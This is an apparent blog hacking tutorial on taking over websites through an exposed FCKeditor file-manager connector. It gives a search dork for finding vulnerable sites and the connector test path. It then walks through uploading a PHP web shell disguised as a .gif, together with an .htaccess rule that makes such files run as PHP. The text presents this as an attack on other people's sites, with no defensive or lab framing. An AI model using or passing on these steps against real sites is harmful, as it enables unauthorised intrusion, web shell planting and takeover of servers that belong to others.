What you will need:
1) Modified .htaccess (Code is below)
2) Shell in name_php.gif format
3) Site with FCKeditor
Chapter I - Collecting vulnerable site
It's easy to dork one.
Simple dork:
Code:
inurl:fckeditor intitle:Connectors Test
When you found a site navigate to the:
Code:
/fckeditor/editor/filemanager/browser/default/connectors/test.html
Code:
[URL='http://www.site.com/fckeditor/']http://www.site.com/fckeditor/
You add
Code:
editor/filemanager/browser/default/connectors/test.html
![[IMG]](http://img831.imageshack.us/img831/7673/regionmk.png)
Now here comes exploiting.
Chapter II - Exploiting
Select "PHP" from the top left drop menu and click "Get folders" if it comes up with this:
![[IMG]](http://img37.imageshack.us/img37/4821/regionbp.png)
It means Connector is enabled and working.
Next thing you want to do is to create a new folder.
![[IMG]](http://img13.imageshack.us/img13/8355/regioney.png)
When you created that click on "Get folders" again to check if it exists.
![[IMG]](http://img651.imageshack.us/img651/8429/regionkl.png)
Open up notepad and paste you shell source in it.
Save it as shell_php.gif.
In current folder field enter your new folder (My case is tutorial-haxor) and press "Get folders" again.
![[IMG]](http://img705.imageshack.us/img705/4076/regionter.png)
![[IMG]](http://img59.imageshack.us/img59/8727/regionjj.png)
Now just upload .htaccess and shell_php.gif
![[IMG]](http://img233.imageshack.us/img233/5909/regionpt.png)
Just access your shell:
![[IMG]](http://img41.imageshack.us/img41/5332/regiondh.png)
And thats it.
I hope you enjoyed this little tutorial.
Thanks for reading!
1) .htaccess code:
Code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
0 comments:
Post a Comment